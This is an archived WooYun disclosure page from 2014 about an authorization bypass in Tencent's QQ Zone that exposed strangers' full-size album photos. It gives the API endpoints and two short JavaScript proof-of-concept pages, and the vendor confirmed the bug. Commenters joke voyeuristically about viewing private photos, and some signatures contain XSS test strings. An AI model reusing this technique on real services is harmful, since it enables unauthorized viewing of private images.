当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047775

漏洞标题:QQ空间可越权查看陌生人相册图片(高清)

相关厂商:腾讯

漏洞作者: blue

提交时间:2014-01-03 16:42

修复时间:2014-02-17 16:43

公开时间:2014-02-17 16:43

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-03: 细节已通知厂商并且等待厂商处理中
2014-01-07: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向核心白帽子及相关领域专家公开
2014-01-27: 细节向普通白帽子公开
2014-02-06: 细节向实习白帽子公开
2014-02-17: 细节向公众公开

简要描述:

RT,通过一些接口最终可以获取到陌生人的相册地址及查看其中的图片,非小图~

详细说明:

1. 默认没有权限访问陌生人的空间和相册

1.png


2. 进入到自己的空间,在全部动态位置,如果有好友动态,点击一下,查看网络请求,其中有以下接口:
http://ic2.s21.qzone.qq.com/cgi-bin/feeds/feeds2_html_hotspot?uin=***(自己的QQ,需要保持登录)&visiteduin=***(经测试,可以为陌生人QQ)&count=10&alpha=1&useutf8=1&g_tk=***
3. 将2获取到的json解析,可以得到topicid和pickey

2.png


4. 在QQ空间还是全部动态位置,如果有好友发布了图片,点击查看图片,监控到一个接口:
http://app.photo.qq.com/cgi-bin/app/cgi_floatview_photo_list?g_tk=***&callback=viewer_Callback&t=202307701&topicId=***&picKey=***&shootTime=&cmtOrder=1&fupdate=1&cmtNum=10&likeNum=5&inCharset=utf-8&outCharset=utf-8&callbackFun=viewer&offset=0&number=20&uin=***&appid=4&isFirst=1&hostUin=***(为想查看的人的QQ)&showMode=1&prevNum=9&postNum=18&_=1388730579218"
替换 ***内容为3获取到的,即能获取到相册图片列表
5. 还等什么?看起吧~~

漏洞证明:

由于图片实在信息量太大~_^,所以在此不做截图,只将自己方便查看图片写的js程序贴上来~
1. 获取动态接口(注意要是有发布图片动态的)
http://10000.user.qzone.qq.com/test/qqphoto.html (自己本地改的hosts,不然图片有referer限制)

<div id="content"></div>
<script src="jquery.js"></script>
<script>
function _Callback(d){
	$.each(d,function(k,v){
		if(k=='data'){
			$.each(v.data,function(ik,iv){
				if(ik==0){
					$.each(iv,function(jk,jv){
						if(jk=='html'){
							$('#content').html(jv);
						}
					});
				}
			});
		}
	});
}
</script>
<script src="http://ic2.s21.qzone.qq.com/cgi-bin/feeds/feeds2_html_hotspot?uin=***&visiteduin=***&count=10&alpha=1&useutf8=1&g_tk=***"></script>


2. 相册图片列表访问
http://10000.user.qzone.qq.com/test/qqphotolist.html

<div id="content"></div>
<script src="jquery.js"></script>
<script>
function viewer_Callback(d){
	var html='';
	$.each(d,function(k,v){
		if(k=='data'){
			$.each(v.photos,function(ik,iv){
				html+='<img src="'+iv.url+'" /><br/>';
			});
			$('#content').html(html);
		}
	});
}
</script>
<script src="http://app.photo.qq.com/cgi-bin/app/cgi_floatview_photo_list?g_tk=***&callback=viewer_Callback&t=202307701&topicId=***&picKey=***&shootTime=&cmtOrder=1&fupdate=1&cmtNum=10&likeNum=5&inCharset=utf-8&outCharset=utf-8&callbackFun=viewer&offset=0&number=20&uin=***&appid=4&isFirst=1&hostUin=***&showMode=1&prevNum=9&postNum=18&_=1388730579218"></script>


修复方案:

权限判断好呗~

版权声明:转载请注明来源 blue@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-07 10:05

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-03 16:43 | Chora ( 普通白帽子 | Rank:337 漏洞数:22 | 生存、生活、生命。)

    可有码?

  2. 2014-01-03 16:44 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    我卡

  3. 2014-01-03 16:44 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    高清

  4. 2014-01-03 16:44 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    - -!我要举报

  5. 2014-01-03 16:46 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    别告诉我还是老的那种的方法

  6. 2014-01-03 16:47 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    原来是你

  7. 2014-01-03 16:47 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    碉堡了!

  8. 2014-01-03 16:52 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    不明觉厉,最新照片貌似就能查看

  9. 2014-01-03 16:55 | 剑无名 ( 普通白帽子 | Rank:146 漏洞数:32 | 此剑无名。)

    不明觉厉,最新照片貌似就能查看

  10. 2014-01-03 16:58 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    去看看肉肉的,看看她是不是又胖了~~

  11. 2014-01-03 16:59 | Smilent ( 实习白帽子 | Rank:34 漏洞数:6 | None)

    高清无码

  12. 2014-01-03 17:04 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

    如实招来,你是不是看了肉肉的照片,你看肉肉都说原来是你。

  13. 2014-01-03 17:07 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    最新照片就可以越权查看。。。我以为不是漏洞!!!

  14. 2014-01-03 17:10 | blue 认证白帽子 ( 普通白帽子 | Rank:779 漏洞数:70 | 我心中有猛虎,细嗅蔷薇。)

    是能看整个相册的所有图片的~

  15. 2014-01-03 17:13 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    挖擦,碉堡了,敢不敢侧陋下

  16. 2014-01-03 17:22 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @blue 所有图片。。。。。。。。。。。

  17. 2014-01-03 17:24 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @肉肉 是不是瞬间凌乱了

  18. 2014-01-03 17:27 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @niliu 还好,跟我有什么关系=。=,我只是好奇怎么做到的

  19. 2014-01-03 17:27 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    把艳照po到网上的人都是什么思想啊

  20. 2014-01-03 17:28 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @肉肉 哈哈,开玩笑啦

  21. 2014-01-03 17:29 | 帅气凌云 ( 普通白帽子 | Rank:314 漏洞数:60 | 弱点扫描{Www.VulScan.CN} 为网站健康检查...)

    上次@肉肉才被钓了空间 这次.....

  22. 2014-01-03 17:36 | blue 认证白帽子 ( 普通白帽子 | Rank:779 漏洞数:70 | 我心中有猛虎,细嗅蔷薇。)

    @肉肉 其中一个相册有20张照片?

  23. 2014-01-03 17:54 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    高清步兵

  24. 2014-01-03 17:55 | Huc-Unis ( 普通白帽子 | Rank:1055 漏洞数:292 | 诶,现在通用奖励越来越低了;离买保时捷卡...)

    高清无码

  25. 2014-01-03 17:58 | 帅气凌云 ( 普通白帽子 | Rank:314 漏洞数:60 | 弱点扫描{Www.VulScan.CN} 为网站健康检查...)

    尔等真是无语了

  26. 2014-01-03 18:01 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我去!!!!!!可以去看服务行业的了?

  27. 2014-01-03 18:15 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    牛B

  28. 2014-01-03 18:18 | 0x004er ( 实习白帽子 | Rank:48 漏洞数:19 | 。。。。。。。)

    居然是“高清”。。。。。

  29. 2014-01-03 18:21 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    V587

  30. 2014-01-03 18:28 | 闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)

    mark

  31. 2014-01-03 18:53 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    高清无码。。。

  32. 2014-01-03 18:55 | PiaCa ( 普通白帽子 | Rank:129 漏洞数:10 | 简单点!啪......嚓~~)

    我出 20wb 能提前让我看看漏洞么?

  33. 2014-01-03 19:44 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @blue 我不记得了,反正没什么见不得人的,随便看随便看随便看.上次xss的事二哥请我吃火锅补偿我了的,你自己看着办

  34. 2014-01-03 19:45 | RootUser ( 路人 | Rank:22 漏洞数:5 | null)

    mark

  35. 2014-01-03 20:00 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @blue @肉肉 完了

  36. 2014-01-03 21:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @肉肉 @肉肉 有吃的记得叫上我啊

  37. 2014-01-03 21:57 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @px1624 好,我吃肉你吃菜

  38. 2014-01-03 23:06 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    @肉肉 你来我这我带你去嫖

  39. 2014-01-04 09:23 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @肉肉 好,看来我应该把昵称改成菜菜

  40. 2014-01-04 11:04 | Mr.醉心 ( 路人 | Rank:2 漏洞数:2 | 爱生活,爱音乐,爱美女,更爱波多野结衣)

    不明觉厉

  41. 2014-01-04 12:40 | 带着套套打飞机 ( 路人 | Rank:4 漏洞数:1 | 嗯, 没什么介绍的。。。。。。。)

    @HackBraid 嗯、

  42. 2014-01-04 14:02 | 三院一霸 ( 路人 | Rank:2 漏洞数:1 | 生命在于折腾)

    高清!

  43. 2014-01-04 14:22 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    无码

  44. 2014-01-05 10:59 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    马克

  45. 2014-01-05 20:05 | Defa ( 普通白帽子 | Rank:113 漏洞数:13 | <img src=1 onerror=alert(1)>)

    牛逼

  46. 2014-02-06 11:19 | Micro Da ( 实习白帽子 | Rank:66 漏洞数:7 | Micro Da)

    学习了.....

  47. 2014-02-06 11:41 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    还可以用不?想去看隐私照。哈哈

  48. 2014-02-15 00:04 | wusuopubupt ( 路人 | Rank:3 漏洞数:2 | BUPTer, linux lover.)

    马克加索尔

  49. 2014-02-17 22:05 | 小黄蜂 ( 路人 | Rank:18 漏洞数:3 | 好男儿名垂千古&好姑娘永垂不朽)

    应该加个无码,哈哈